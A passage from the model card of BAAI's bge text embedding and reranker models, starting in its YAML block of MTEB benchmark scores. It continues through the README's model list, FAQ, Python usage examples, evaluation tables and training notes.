- type: map_at_5
value: 1.076
- type: mrr_at_1
value: 86.0
- type: mrr_at_10
value: 91.8
- type: mrr_at_100
value: 91.8
- type: mrr_at_1000
value: 91.8
- type: mrr_at_3
value: 91.0
- type: mrr_at_5
value: 91.8
- type: ndcg_at_1
value: 82.0
- type: ndcg_at_10
value: 78.07300000000001
- type: ndcg_at_100
value: 58.231
- type: ndcg_at_1000
value: 51.153000000000006
- type: ndcg_at_3
value: 81.123
- type: ndcg_at_5
value: 81.059
- type: precision_at_1
value: 86.0
- type: precision_at_10
value: 83.0
- type: precision_at_100
value: 59.38
- type: precision_at_1000
value: 22.55
- type: precision_at_3
value: 87.333
- type: precision_at_5
value: 86.8
- type: recall_at_1
value: 0.22
- type: recall_at_10
value: 2.2079999999999997
- type: recall_at_100
value: 14.069
- type: recall_at_1000
value: 47.678
- type: recall_at_3
value: 0.7040000000000001
- type: recall_at_5
value: 1.161
- task:
type: Retrieval
dataset:
type: webis-touche2020
name: MTEB Touche2020
config: default
split: test
revision: None
metrics:
- type: map_at_1
value: 2.809
- type: map_at_10
value: 10.394
- type: map_at_100
value: 16.598
- type: map_at_1000
value: 18.142
- type: map_at_3
value: 5.572
- type: map_at_5
value: 7.1370000000000005
- type: mrr_at_1
value: 32.653
- type: mrr_at_10
value: 46.564
- type: mrr_at_100
value: 47.469
- type: mrr_at_1000
value: 47.469
- type: mrr_at_3
value: 42.177
- type: mrr_at_5
value: 44.524
- type: ndcg_at_1
value: 30.612000000000002
- type: ndcg_at_10
value: 25.701
- type: ndcg_at_100
value: 37.532
- type: ndcg_at_1000
value: 48.757
- type: ndcg_at_3
value: 28.199999999999996
- type: ndcg_at_5
value: 25.987
- type: precision_at_1
value: 32.653
- type: precision_at_10
value: 23.469
- type: precision_at_100
value: 7.9799999999999995
- type: precision_at_1000
value: 1.5350000000000001
- type: precision_at_3
value: 29.932
- type: precision_at_5
value: 26.122
- type: recall_at_1
value: 2.809
- type: recall_at_10
value: 16.887
- type: recall_at_100
value: 48.67
- type: recall_at_1000
value: 82.89699999999999
- type: recall_at_3
value: 6.521000000000001
- type: recall_at_5
value: 9.609
- task:
type: Classification
dataset:
type: mteb/toxic_conversations_50k
name: MTEB ToxicConversationsClassification
config: default
split: test
revision: d7c0de2777da35d6aae2200a62c6e0e5af397c4c
metrics:
- type: accuracy
value: 71.57860000000001
- type: ap
value: 13.82629211536393
- type: f1
value: 54.59860966183956
- task:
type: Classification
dataset:
type: mteb/tweet_sentiment_extraction
name: MTEB TweetSentimentExtractionClassification
config: default
split: test
revision: d604517c81ca91fe16a244d1248fc021f9ecee7a
metrics:
- type: accuracy
value: 59.38030560271647
- type: f1
value: 59.69685552567865
- task:
type: Clustering
dataset:
type: mteb/twentynewsgroups-clustering
name: MTEB TwentyNewsgroupsClustering
config: default
split: test
revision: 6125ec4e24fa026cec8a478383ee943acfbd5449
metrics:
- type: v_measure
value: 51.4736717043405
- task:
type: PairClassification
dataset:
type: mteb/twittersemeval2015-pairclassification
name: MTEB TwitterSemEval2015
config: default
split: test
revision: 70970daeab8776df92f5ea462b6173c0b46fd2d1
metrics:
- type: cos_sim_accuracy
value: 86.92853311080646
- type: cos_sim_ap
value: 77.67872502591382
- type: cos_sim_f1
value: 70.33941236068895
- type: cos_sim_precision
value: 67.63273258645884
- type: cos_sim_recall
value: 73.27176781002639
- type: dot_accuracy
value: 85.79603027954938
- type: dot_ap
value: 73.73786190233379
- type: dot_f1
value: 67.3437901774235
- type: dot_precision
value: 65.67201604814443
- type: dot_recall
value: 69.10290237467018
- type: euclidean_accuracy
value: 86.94045419324074
- type: euclidean_ap
value: 77.6687791535167
- type: euclidean_f1
value: 70.47209214023542
- type: euclidean_precision
value: 67.7207492094381
- type: euclidean_recall
value: 73.45646437994723
- type: manhattan_accuracy
value: 86.87488823985218
- type: manhattan_ap
value: 77.63373392430728
- type: manhattan_f1
value: 70.40920716112532
- type: manhattan_precision
value: 68.31265508684864
- type: manhattan_recall
value: 72.63852242744063
- type: max_accuracy
value: 86.94045419324074
- type: max_ap
value: 77.67872502591382
- type: max_f1
value: 70.47209214023542
- task:
type: PairClassification
dataset:
type: mteb/twitterurlcorpus-pairclassification
name: MTEB TwitterURLCorpus
config: default
split: test
revision: 8b6510b0b1fa4e4c4f879467980e9be563ec1cdf
metrics:
- type: cos_sim_accuracy
value: 88.67155664221679
- type: cos_sim_ap
value: 85.64591703003417
- type: cos_sim_f1
value: 77.59531005352656
- type: cos_sim_precision
value: 73.60967184801382
- type: cos_sim_recall
value: 82.03726516784724
- type: dot_accuracy
value: 88.41541506578181
- type: dot_ap
value: 84.6482788957769
- type: dot_f1
value: 77.04748541466657
- type: dot_precision
value: 74.02440754931176
- type: dot_recall
value: 80.3279950723745
- type: euclidean_accuracy
value: 88.63080684596576
- type: euclidean_ap
value: 85.44570045321562
- type: euclidean_f1
value: 77.28769403336106
- type: euclidean_precision
value: 72.90600040958427
- type: euclidean_recall
value: 82.22975053895904
- type: manhattan_accuracy
value: 88.59393798269105
- type: manhattan_ap
value: 85.40271361038187
- type: manhattan_f1
value: 77.17606419344392
- type: manhattan_precision
value: 72.4447747078295
- type: manhattan_recall
value: 82.5685247921158
- type: max_accuracy
value: 88.67155664221679
- type: max_ap
value: 85.64591703003417
- type: max_f1
value: 77.59531005352656
license: mit
language:
- en
---
<h1 align="center">FlagEmbedding</h1>
<h4 align="center">
<p>
<a href=#model-list>Model List</a> |
<a href=#frequently-asked-questions>FAQ</a> |
<a href=#usage>Usage</a> |
<a href="#evaluation">Evaluation</a> |
<a href="#train">Train</a> |
<a href="#contact">Contact</a> |
<a href="#citation">Citation</a> |
<a href="#license">License</a>
<p>
</h4>
More details please refer to our Github: [FlagEmbedding](https://github.com/FlagOpen/FlagEmbedding).
[English](README.md) | [中文](https://github.com/FlagOpen/FlagEmbedding/blob/master/README_zh.md)
FlagEmbedding can map any text to a low-dimensional dense vector which can be used for tasks like retrieval, classification, clustering, or semantic search.
And it also can be used in vector databases for LLMs.
************* 🌟**Updates**🌟 *************
- 10/12/2023: Release [LLM-Embedder](./FlagEmbedding/llm_embedder/README.md), a unified embedding model to support diverse retrieval augmentation needs for LLMs. [Paper](https://arxiv.org/pdf/2310.07554.pdf) :fire:
- 09/15/2023: The [technical report](https://arxiv.org/pdf/2309.07597.pdf) of BGE has been released
- 09/15/2023: The [masive training data](https://data.baai.ac.cn/details/BAAI-MTP) of BGE has been released
- 09/12/2023: New models:
- **New reranker model**: release cross-encoder models `BAAI/bge-reranker-base` and `BAAI/bge-reranker-large`, which are more powerful than embedding model. We recommend to use/fine-tune them to re-rank top-k documents returned by embedding models.
- **update embedding model**: release `bge-*-v1.5` embedding model to alleviate the issue of the similarity distribution, and enhance its retrieval ability without instruction.
<details>
<summary>More</summary>
<!-- ### More -->
- 09/07/2023: Update [fine-tune code](https://github.com/FlagOpen/FlagEmbedding/blob/master/FlagEmbedding/baai_general_embedding/README.md): Add script to mine hard negatives and support adding instruction during fine-tuning.
- 08/09/2023: BGE Models are integrated into **Langchain**, you can use it like [this](#using-langchain); C-MTEB **leaderboard** is [available](https://huggingface.co/spaces/mteb/leaderboard).
- 08/05/2023: Release base-scale and small-scale models, **best performance among the models of the same size 🤗**
- 08/02/2023: Release `bge-large-*`(short for BAAI General Embedding) Models, **rank 1st on MTEB and C-MTEB benchmark!** :tada: :tada:
- 08/01/2023: We release the [Chinese Massive Text Embedding Benchmark](https://github.com/FlagOpen/FlagEmbedding/blob/master/C_MTEB) (**C-MTEB**), consisting of 31 test dataset.
</details>
## Model List
`bge` is short for `BAAI general embedding`.
| Model | Language | | Description | query instruction for retrieval [1] |
|:-------------------------------|:--------:| :--------:| :--------:|:--------:|
| [BAAI/llm-embedder](https://huggingface.co/BAAI/llm-embedder) | English | [Inference](./FlagEmbedding/llm_embedder/README.md) [Fine-tune](./FlagEmbedding/llm_embedder/README.md) | a unified embedding model to support diverse retrieval augmentation needs for LLMs | See [README](./FlagEmbedding/llm_embedder/README.md) |
| [BAAI/bge-reranker-large](https://huggingface.co/BAAI/bge-reranker-large) | Chinese and English | [Inference](#usage-for-reranker) [Fine-tune](https://github.com/FlagOpen/FlagEmbedding/tree/master/examples/reranker) | a cross-encoder model which is more accurate but less efficient [2] | |
| [BAAI/bge-reranker-base](https://huggingface.co/BAAI/bge-reranker-base) | Chinese and English | [Inference](#usage-for-reranker) [Fine-tune](https://github.com/FlagOpen/FlagEmbedding/tree/master/examples/reranker) | a cross-encoder model which is more accurate but less efficient [2] | |
| [BAAI/bge-large-en-v1.5](https://huggingface.co/BAAI/bge-large-en-v1.5) | English | [Inference](#usage-for-embedding-model) [Fine-tune](https://github.com/FlagOpen/FlagEmbedding/tree/master/examples/finetune) | version 1.5 with more reasonable similarity distribution | `Represent this sentence for searching relevant passages: ` |
| [BAAI/bge-base-en-v1.5](https://huggingface.co/BAAI/bge-base-en-v1.5) | English | [Inference](#usage-for-embedding-model) [Fine-tune](https://github.com/FlagOpen/FlagEmbedding/tree/master/examples/finetune) | version 1.5 with more reasonable similarity distribution | `Represent this sentence for searching relevant passages: ` |
| [BAAI/bge-small-en-v1.5](https://huggingface.co/BAAI/bge-small-en-v1.5) | English | [Inference](#usage-for-embedding-model) [Fine-tune](https://github.com/FlagOpen/FlagEmbedding/tree/master/examples/finetune) | version 1.5 with more reasonable similarity distribution | `Represent this sentence for searching relevant passages: ` |
| [BAAI/bge-large-zh-v1.5](https://huggingface.co/BAAI/bge-large-zh-v1.5) | Chinese | [Inference](#usage-for-embedding-model) [Fine-tune](https://github.com/FlagOpen/FlagEmbedding/tree/master/examples/finetune) | version 1.5 with more reasonable similarity distribution | `为这个句子生成表示以用于检索相关文章:` |
| [BAAI/bge-base-zh-v1.5](https://huggingface.co/BAAI/bge-base-zh-v1.5) | Chinese | [Inference](#usage-for-embedding-model) [Fine-tune](https://github.com/FlagOpen/FlagEmbedding/tree/master/examples/finetune) | version 1.5 with more reasonable similarity distribution | `为这个句子生成表示以用于检索相关文章:` |
| [BAAI/bge-small-zh-v1.5](https://huggingface.co/BAAI/bge-small-zh-v1.5) | Chinese | [Inference](#usage-for-embedding-model) [Fine-tune](https://github.com/FlagOpen/FlagEmbedding/tree/master/examples/finetune) | version 1.5 with more reasonable similarity distribution | `为这个句子生成表示以用于检索相关文章:` |
| [BAAI/bge-large-en](https://huggingface.co/BAAI/bge-large-en) | English | [Inference](#usage-for-embedding-model) [Fine-tune](https://github.com/FlagOpen/FlagEmbedding/tree/master/examples/finetune) | :trophy: rank **1st** in [MTEB](https://huggingface.co/spaces/mteb/leaderboard) leaderboard | `Represent this sentence for searching relevant passages: ` |
| [BAAI/bge-base-en](https://huggingface.co/BAAI/bge-base-en) | English | [Inference](#usage-for-embedding-model) [Fine-tune](https://github.com/FlagOpen/FlagEmbedding/tree/master/examples/finetune) | a base-scale model but with similar ability to `bge-large-en` | `Represent this sentence for searching relevant passages: ` |
| [BAAI/bge-small-en](https://huggingface.co/BAAI/bge-small-en) | English | [Inference](#usage-for-embedding-model) [Fine-tune](https://github.com/FlagOpen/FlagEmbedding/tree/master/examples/finetune) |a small-scale model but with competitive performance | `Represent this sentence for searching relevant passages: ` |
| [BAAI/bge-large-zh](https://huggingface.co/BAAI/bge-large-zh) | Chinese | [Inference](#usage-for-embedding-model) [Fine-tune](https://github.com/FlagOpen/FlagEmbedding/tree/master/examples/finetune) | :trophy: rank **1st** in [C-MTEB](https://github.com/FlagOpen/FlagEmbedding/tree/master/C_MTEB) benchmark | `为这个句子生成表示以用于检索相关文章:` |
| [BAAI/bge-base-zh](https://huggingface.co/BAAI/bge-base-zh) | Chinese | [Inference](#usage-for-embedding-model) [Fine-tune](https://github.com/FlagOpen/FlagEmbedding/tree/master/examples/finetune) | a base-scale model but with similar ability to `bge-large-zh` | `为这个句子生成表示以用于检索相关文章:` |
| [BAAI/bge-small-zh](https://huggingface.co/BAAI/bge-small-zh) | Chinese | [Inference](#usage-for-embedding-model) [Fine-tune](https://github.com/FlagOpen/FlagEmbedding/tree/master/examples/finetune) | a small-scale model but with competitive performance | `为这个句子生成表示以用于检索相关文章:` |
[1\]: If you need to search the relevant passages to a query, we suggest to add the instruction to the query; in other cases, no instruction is needed, just use the original query directly. In all cases, **no instruction** needs to be added to passages.
[2\]: Different from embedding model, reranker uses question and document as input and directly output similarity instead of embedding. To balance the accuracy and time cost, cross-encoder is widely used to re-rank top-k documents retrieved by other simple models.
For examples, use bge embedding model to retrieve top 100 relevant documents, and then use bge reranker to re-rank the top 100 document to get the final top-3 results.
All models have been uploaded to Huggingface Hub, and you can see them at https://huggingface.co/BAAI.
If you cannot open the Huggingface Hub, you also can download the models at https://model.baai.ac.cn/models .
## Frequently asked questions
<details>
<summary>1. How to fine-tune bge embedding model?</summary>
<!-- ### How to fine-tune bge embedding model? -->
Following this [example](https://github.com/FlagOpen/FlagEmbedding/tree/master/examples/finetune) to prepare data and fine-tune your model.
Some suggestions:
- Mine hard negatives following this [example](https://github.com/FlagOpen/FlagEmbedding/tree/master/examples/finetune#hard-negatives), which can improve the retrieval performance.
- If you pre-train bge on your data, the pre-trained model cannot be directly used to calculate similarity, and it must be fine-tuned with contrastive learning before computing similarity.
- If the accuracy of the fine-tuned model is still not high, it is recommended to use/fine-tune the cross-encoder model (bge-reranker) to re-rank top-k results. Hard negatives also are needed to fine-tune reranker.
</details>
<details>
<summary>2. The similarity score between two dissimilar sentences is higher than 0.5</summary>
<!-- ### The similarity score between two dissimilar sentences is higher than 0.5 -->
**Suggest to use bge v1.5, which alleviates the issue of the similarity distribution.**
Since we finetune the models by contrastive learning with a temperature of 0.01,
the similarity distribution of the current BGE model is about in the interval \[0.6, 1\].
So a similarity score greater than 0.5 does not indicate that the two sentences are similar.
For downstream tasks, such as passage retrieval or semantic similarity,
**what matters is the relative order of the scores, not the absolute value.**
If you need to filter similar sentences based on a similarity threshold,
please select an appropriate similarity threshold based on the similarity distribution on your data (such as 0.8, 0.85, or even 0.9).
</details>
<details>
<summary>3. When does the query instruction need to be used</summary>
<!-- ### When does the query instruction need to be used -->
For the `bge-*-v1.5`, we improve its retrieval ability when not using instruction.
No instruction only has a slight degradation in retrieval performance compared with using instruction.
So you can generate embedding without instruction in all cases for convenience.
For a retrieval task that uses short queries to find long related documents,
it is recommended to add instructions for these short queries.
**The best method to decide whether to add instructions for queries is choosing the setting that achieves better performance on your task.**
In all cases, the documents/passages do not need to add the instruction.
</details>
## Usage
### Usage for Embedding Model
Here are some examples for using `bge` models with
[FlagEmbedding](#using-flagembedding), [Sentence-Transformers](#using-sentence-transformers), [Langchain](#using-langchain), or [Huggingface Transformers](#using-huggingface-transformers).
#### Using FlagEmbedding
```
pip install -U FlagEmbedding
```
If it doesn't work for you, you can see [FlagEmbedding](https://github.com/FlagOpen/FlagEmbedding/blob/master/FlagEmbedding/baai_general_embedding/README.md) for more methods to install FlagEmbedding.
```python
from FlagEmbedding import FlagModel
sentences_1 = ["样例数据-1", "样例数据-2"]
sentences_2 = ["样例数据-3", "样例数据-4"]
model = FlagModel('BAAI/bge-large-zh-v1.5',
query_instruction_for_retrieval="为这个句子生成表示以用于检索相关文章:",
use_fp16=True) # Setting use_fp16 to True speeds up computation with a slight performance degradation
embeddings_1 = model.encode(sentences_1)
embeddings_2 = model.encode(sentences_2)
similarity = embeddings_1 @ embeddings_2.T
print(similarity)
# for s2p(short query to long passage) retrieval task, suggest to use encode_queries() which will automatically add the instruction to each query
# corpus in retrieval task can still use encode() or encode_corpus(), since they don't need instruction
queries = ['query_1', 'query_2']
passages = ["样例文档-1", "样例文档-2"]
q_embeddings = model.encode_queries(queries)
p_embeddings = model.encode(passages)
scores = q_embeddings @ p_embeddings.T
```
For the value of the argument `query_instruction_for_retrieval`, see [Model List](https://github.com/FlagOpen/FlagEmbedding/tree/master#model-list).
By default, FlagModel will use all available GPUs when encoding. Please set `os.environ["CUDA_VISIBLE_DEVICES"]` to select specific GPUs.
You also can set `os.environ["CUDA_VISIBLE_DEVICES"]=""` to make all GPUs unavailable.
#### Using Sentence-Transformers
You can also use the `bge` models with [sentence-transformers](https://www.SBERT.net):
```
pip install -U sentence-transformers
```
```python
from sentence_transformers import SentenceTransformer
sentences_1 = ["样例数据-1", "样例数据-2"]
sentences_2 = ["样例数据-3", "样例数据-4"]
model = SentenceTransformer('BAAI/bge-large-zh-v1.5')
embeddings_1 = model.encode(sentences_1, normalize_embeddings=True)
embeddings_2 = model.encode(sentences_2, normalize_embeddings=True)
similarity = embeddings_1 @ embeddings_2.T
print(similarity)
```
For s2p(short query to long passage) retrieval task,
each short query should start with an instruction (instructions see [Model List](https://github.com/FlagOpen/FlagEmbedding/tree/master#model-list)).
But the instruction is not needed for passages.
```python
from sentence_transformers import SentenceTransformer
queries = ['query_1', 'query_2']
passages = ["样例文档-1", "样例文档-2"]
instruction = "为这个句子生成表示以用于检索相关文章:"
model = SentenceTransformer('BAAI/bge-large-zh-v1.5')
q_embeddings = model.encode([instruction+q for q in queries], normalize_embeddings=True)
p_embeddings = model.encode(passages, normalize_embeddings=True)
scores = q_embeddings @ p_embeddings.T
```
#### Using Langchain
You can use `bge` in langchain like this:
```python
from langchain.embeddings import HuggingFaceBgeEmbeddings
model_name = "BAAI/bge-large-en-v1.5"
model_kwargs = {'device': 'cuda'}
encode_kwargs = {'normalize_embeddings': True} # set True to compute cosine similarity
model = HuggingFaceBgeEmbeddings(
model_name=model_name,
model_kwargs=model_kwargs,
encode_kwargs=encode_kwargs,
query_instruction="为这个句子生成表示以用于检索相关文章:"
)
model.query_instruction = "为这个句子生成表示以用于检索相关文章:"
```
#### Using HuggingFace Transformers
With the transformers package, you can use the model like this: First, you pass your input through the transformer model, then you select the last hidden state of the first token (i.e., [CLS]) as the sentence embedding.
```python
from transformers import AutoTokenizer, AutoModel
import torch
# Sentences we want sentence embeddings for
sentences = ["样例数据-1", "样例数据-2"]
# Load model from HuggingFace Hub
tokenizer = AutoTokenizer.from_pretrained('BAAI/bge-large-zh-v1.5')
model = AutoModel.from_pretrained('BAAI/bge-large-zh-v1.5')
model.eval()
# Tokenize sentences
encoded_input = tokenizer(sentences, padding=True, truncation=True, return_tensors='pt')
# for s2p(short query to long passage) retrieval task, add an instruction to query (not add instruction for passages)
# encoded_input = tokenizer([instruction + q for q in queries], padding=True, truncation=True, return_tensors='pt')
# Compute token embeddings
with torch.no_grad():
model_output = model(**encoded_input)
# Perform pooling. In this case, cls pooling.
sentence_embeddings = model_output[0][:, 0]
# normalize embeddings
sentence_embeddings = torch.nn.functional.normalize(sentence_embeddings, p=2, dim=1)
print("Sentence embeddings:", sentence_embeddings)
```
### Usage for Reranker
Different from embedding model, reranker uses question and document as input and directly output similarity instead of embedding.
You can get a relevance score by inputting query and passage to the reranker.
The reranker is optimized based cross-entropy loss, so the relevance score is not bounded to a specific range.
#### Using FlagEmbedding
```
pip install -U FlagEmbedding
```
Get relevance scores (higher scores indicate more relevance):
```python
from FlagEmbedding import FlagReranker
reranker = FlagReranker('BAAI/bge-reranker-large', use_fp16=True) # Setting use_fp16 to True speeds up computation with a slight performance degradation
score = reranker.compute_score(['query', 'passage'])
print(score)
scores = reranker.compute_score([['what is panda?', 'hi'], ['what is panda?', 'The giant panda (Ailuropoda melanoleuca), sometimes called a panda bear or simply panda, is a bear species endemic to China.']])
print(scores)
```
#### Using Huggingface transformers
```python
import torch
from transformers import AutoModelForSequenceClassification, AutoTokenizer
tokenizer = AutoTokenizer.from_pretrained('BAAI/bge-reranker-large')
model = AutoModelForSequenceClassification.from_pretrained('BAAI/bge-reranker-large')
model.eval()
pairs = [['what is panda?', 'hi'], ['what is panda?', 'The giant panda (Ailuropoda melanoleuca), sometimes called a panda bear or simply panda, is a bear species endemic to China.']]
with torch.no_grad():
inputs = tokenizer(pairs, padding=True, truncation=True, return_tensors='pt', max_length=512)
scores = model(**inputs, return_dict=True).logits.view(-1, ).float()
print(scores)
```
## Evaluation
`baai-general-embedding` models achieve **state-of-the-art performance on both MTEB and C-MTEB leaderboard!**
For more details and evaluation tools see our [scripts](https://github.com/FlagOpen/FlagEmbedding/blob/master/C_MTEB/README.md).
- **MTEB**:
| Model Name | Dimension | Sequence Length | Average (56) | Retrieval (15) |Clustering (11) | Pair Classification (3) | Reranking (4) | STS (10) | Summarization (1) | Classification (12) |
|:----:|:---:|:---:|:---:|:---:|:---:|:---:|:---:|:---:|:---:|:---:|
| [BAAI/bge-large-en-v1.5](https://huggingface.co/BAAI/bge-large-en-v1.5) | 1024 | 512 | **64.23** | **54.29** | 46.08 | 87.12 | 60.03 | 83.11 | 31.61 | 75.97 |
| [BAAI/bge-base-en-v1.5](https://huggingface.co/BAAI/bge-base-en-v1.5) | 768 | 512 | 63.55 | 53.25 | 45.77 | 86.55 | 58.86 | 82.4 | 31.07 | 75.53 |
| [BAAI/bge-small-en-v1.5](https://huggingface.co/BAAI/bge-small-en-v1.5) | 384 | 512 | 62.17 |51.68 | 43.82 | 84.92 | 58.36 | 81.59 | 30.12 | 74.14 |
| [bge-large-en](https://huggingface.co/BAAI/bge-large-en) | 1024 | 512 | 63.98 | 53.9 | 46.98 | 85.8 | 59.48 | 81.56 | 32.06 | 76.21 |
| [bge-base-en](https://huggingface.co/BAAI/bge-base-en) | 768 | 512 | 63.36 | 53.0 | 46.32 | 85.86 | 58.7 | 81.84 | 29.27 | 75.27 |
| [gte-large](https://huggingface.co/thenlper/gte-large) | 1024 | 512 | 63.13 | 52.22 | 46.84 | 85.00 | 59.13 | 83.35 | 31.66 | 73.33 |
| [gte-base](https://huggingface.co/thenlper/gte-base) | 768 | 512 | 62.39 | 51.14 | 46.2 | 84.57 | 58.61 | 82.3 | 31.17 | 73.01 |
| [e5-large-v2](https://huggingface.co/intfloat/e5-large-v2) | 1024| 512 | 62.25 | 50.56 | 44.49 | 86.03 | 56.61 | 82.05 | 30.19 | 75.24 |
| [bge-small-en](https://huggingface.co/BAAI/bge-small-en) | 384 | 512 | 62.11 | 51.82 | 44.31 | 83.78 | 57.97 | 80.72 | 30.53 | 74.37 |
| [instructor-xl](https://huggingface.co/hkunlp/instructor-xl) | 768 | 512 | 61.79 | 49.26 | 44.74 | 86.62 | 57.29 | 83.06 | 32.32 | 61.79 |
| [e5-base-v2](https://huggingface.co/intfloat/e5-base-v2) | 768 | 512 | 61.5 | 50.29 | 43.80 | 85.73 | 55.91 | 81.05 | 30.28 | 73.84 |
| [gte-small](https://huggingface.co/thenlper/gte-small) | 384 | 512 | 61.36 | 49.46 | 44.89 | 83.54 | 57.7 | 82.07 | 30.42 | 72.31 |
| [text-embedding-ada-002](https://platform.openai.com/docs/guides/embeddings) | 1536 | 8192 | 60.99 | 49.25 | 45.9 | 84.89 | 56.32 | 80.97 | 30.8 | 70.93 |
| [e5-small-v2](https://huggingface.co/intfloat/e5-base-v2) | 384 | 512 | 59.93 | 49.04 | 39.92 | 84.67 | 54.32 | 80.39 | 31.16 | 72.94 |
| [sentence-t5-xxl](https://huggingface.co/sentence-transformers/sentence-t5-xxl) | 768 | 512 | 59.51 | 42.24 | 43.72 | 85.06 | 56.42 | 82.63 | 30.08 | 73.42 |
| [all-mpnet-base-v2](https://huggingface.co/sentence-transformers/all-mpnet-base-v2) | 768 | 514 | 57.78 | 43.81 | 43.69 | 83.04 | 59.36 | 80.28 | 27.49 | 65.07 |
| [sgpt-bloom-7b1-msmarco](https://huggingface.co/bigscience/sgpt-bloom-7b1-msmarco) | 4096 | 2048 | 57.59 | 48.22 | 38.93 | 81.9 | 55.65 | 77.74 | 33.6 | 66.19 |
- **C-MTEB**:
We create the benchmark C-MTEB for Chinese text embedding which consists of 31 datasets from 6 tasks.
Please refer to [C_MTEB](https://github.com/FlagOpen/FlagEmbedding/blob/master/C_MTEB/README.md) for a detailed introduction.
| Model | Embedding dimension | Avg | Retrieval | STS | PairClassification | Classification | Reranking | Clustering |
|:-------------------------------|:--------:|:--------:|:--------:|:--------:|:--------:|:--------:|:--------:|:--------:|
| [**BAAI/bge-large-zh-v1.5**](https://huggingface.co/BAAI/bge-large-zh-v1.5) | 1024 | **64.53** | 70.46 | 56.25 | 81.6 | 69.13 | 65.84 | 48.99 |
| [BAAI/bge-base-zh-v1.5](https://huggingface.co/BAAI/bge-base-zh-v1.5) | 768 | 63.13 | 69.49 | 53.72 | 79.75 | 68.07 | 65.39 | 47.53 |
| [BAAI/bge-small-zh-v1.5](https://huggingface.co/BAAI/bge-small-zh-v1.5) | 512 | 57.82 | 61.77 | 49.11 | 70.41 | 63.96 | 60.92 | 44.18 |
| [BAAI/bge-large-zh](https://huggingface.co/BAAI/bge-large-zh) | 1024 | 64.20 | 71.53 | 54.98 | 78.94 | 68.32 | 65.11 | 48.39 |
| [bge-large-zh-noinstruct](https://huggingface.co/BAAI/bge-large-zh-noinstruct) | 1024 | 63.53 | 70.55 | 53 | 76.77 | 68.58 | 64.91 | 50.01 |
| [BAAI/bge-base-zh](https://huggingface.co/BAAI/bge-base-zh) | 768 | 62.96 | 69.53 | 54.12 | 77.5 | 67.07 | 64.91 | 47.63 |
| [multilingual-e5-large](https://huggingface.co/intfloat/multilingual-e5-large) | 1024 | 58.79 | 63.66 | 48.44 | 69.89 | 67.34 | 56.00 | 48.23 |
| [BAAI/bge-small-zh](https://huggingface.co/BAAI/bge-small-zh) | 512 | 58.27 | 63.07 | 49.45 | 70.35 | 63.64 | 61.48 | 45.09 |
| [m3e-base](https://huggingface.co/moka-ai/m3e-base) | 768 | 57.10 | 56.91 | 50.47 | 63.99 | 67.52 | 59.34 | 47.68 |
| [m3e-large](https://huggingface.co/moka-ai/m3e-large) | 1024 | 57.05 | 54.75 | 50.42 | 64.3 | 68.2 | 59.66 | 48.88 |
| [multilingual-e5-base](https://huggingface.co/intfloat/multilingual-e5-base) | 768 | 55.48 | 61.63 | 46.49 | 67.07 | 65.35 | 54.35 | 40.68 |
| [multilingual-e5-small](https://huggingface.co/intfloat/multilingual-e5-small) | 384 | 55.38 | 59.95 | 45.27 | 66.45 | 65.85 | 53.86 | 45.26 |
| [text-embedding-ada-002(OpenAI)](https://platform.openai.com/docs/guides/embeddings/what-are-embeddings) | 1536 | 53.02 | 52.0 | 43.35 | 69.56 | 64.31 | 54.28 | 45.68 |
| [luotuo](https://huggingface.co/silk-road/luotuo-bert-medium) | 1024 | 49.37 | 44.4 | 42.78 | 66.62 | 61 | 49.25 | 44.39 |
| [text2vec-base](https://huggingface.co/shibing624/text2vec-base-chinese) | 768 | 47.63 | 38.79 | 43.41 | 67.41 | 62.19 | 49.45 | 37.66 |
| [text2vec-large](https://huggingface.co/GanymedeNil/text2vec-large-chinese) | 1024 | 47.36 | 41.94 | 44.97 | 70.86 | 60.66 | 49.16 | 30.02 |
- **Reranking**:
See [C_MTEB](https://github.com/FlagOpen/FlagEmbedding/blob/master/C_MTEB/) for evaluation script.
| Model | T2Reranking | T2RerankingZh2En\* | T2RerankingEn2Zh\* | MMarcoReranking | CMedQAv1 | CMedQAv2 | Avg |
|:-------------------------------|:--------:|:--------:|:--------:|:--------:|:--------:|:--------:|:--------:|
| text2vec-base-multilingual | 64.66 | 62.94 | 62.51 | 14.37 | 48.46 | 48.6 | 50.26 |
| multilingual-e5-small | 65.62 | 60.94 | 56.41 | 29.91 | 67.26 | 66.54 | 57.78 |
| multilingual-e5-large | 64.55 | 61.61 | 54.28 | 28.6 | 67.42 | 67.92 | 57.4 |
| multilingual-e5-base | 64.21 | 62.13 | 54.68 | 29.5 | 66.23 | 66.98 | 57.29 |
| m3e-base | 66.03 | 62.74 | 56.07 | 17.51 | 77.05 | 76.76 | 59.36 |
| m3e-large | 66.13 | 62.72 | 56.1 | 16.46 | 77.76 | 78.27 | 59.57 |
| bge-base-zh-v1.5 | 66.49 | 63.25 | 57.02 | 29.74 | 80.47 | 84.88 | 63.64 |
| bge-large-zh-v1.5 | 65.74 | 63.39 | 57.03 | 28.74 | 83.45 | 85.44 | 63.97 |
| [BAAI/bge-reranker-base](https://huggingface.co/BAAI/bge-reranker-base) | 67.28 | 63.95 | 60.45 | 35.46 | 81.26 | 84.1 | 65.42 |
| [BAAI/bge-reranker-large](https://huggingface.co/BAAI/bge-reranker-large) | 67.6 | 64.03 | 61.44 | 37.16 | 82.15 | 84.18 | 66.09 |
\* : T2RerankingZh2En and T2RerankingEn2Zh are cross-language retrieval tasks
## Train
### BAAI Embedding
We pre-train the models using [retromae](https://github.com/staoxiao/RetroMAE) and train them on large-scale pairs data using contrastive learning.
**You can fine-tune the embedding model on your data following our [examples](https://github.com/FlagOpen/FlagEmbedding/tree/master/examples/finetune).**
We also provide a [pre-train example](https://github.com/FlagOpen/FlagEmbedding/tree/master/examples/pretrain).
Note that the goal of pre-training is to reconstruct the text, and the pre-trained model cannot be used for similarity calculation directly, it needs to be fine-tuned.
More training details for bge see [baai_general_embedding](https://github.com/FlagOpen/FlagEmbedding/blob/master/FlagEmbedding/baai_general_embedding/README.md).
### BGE Reranker
Cross-encoder will perform full-attention over the input pair,
which is more accurate than embedding model (i.e., bi-encoder) but more time-consuming than embedding model.
Therefore, it can be used to re-rank the top-k documents returned by embedding model.
We train the cross-encoder on a multilingual pair data,
The data format is the same as embedding model, so you can fine-tune it easily following our [example](https://github.com/FlagOpen/FlagEmbedding/tree/master/examples/reranker).
More details please refer to [./FlagEmbedding/reranker/README.md](https://github.com/FlagOpen/FlagEmbedding/tree/master/FlagEmbedding/reranker)
## Contact
If you have any question or suggestion related to this project, feel free to open an issue or pull request.
You also can email Shitao Xiao([email protected]) and Zheng Liu([email protected]).
## Citation
If you find this repository useful, please consider giving a star :star: and citation
```
@misc{bge_embedding,
title={C-Pack: Packaged Resources To Advance General Chinese Embedding},
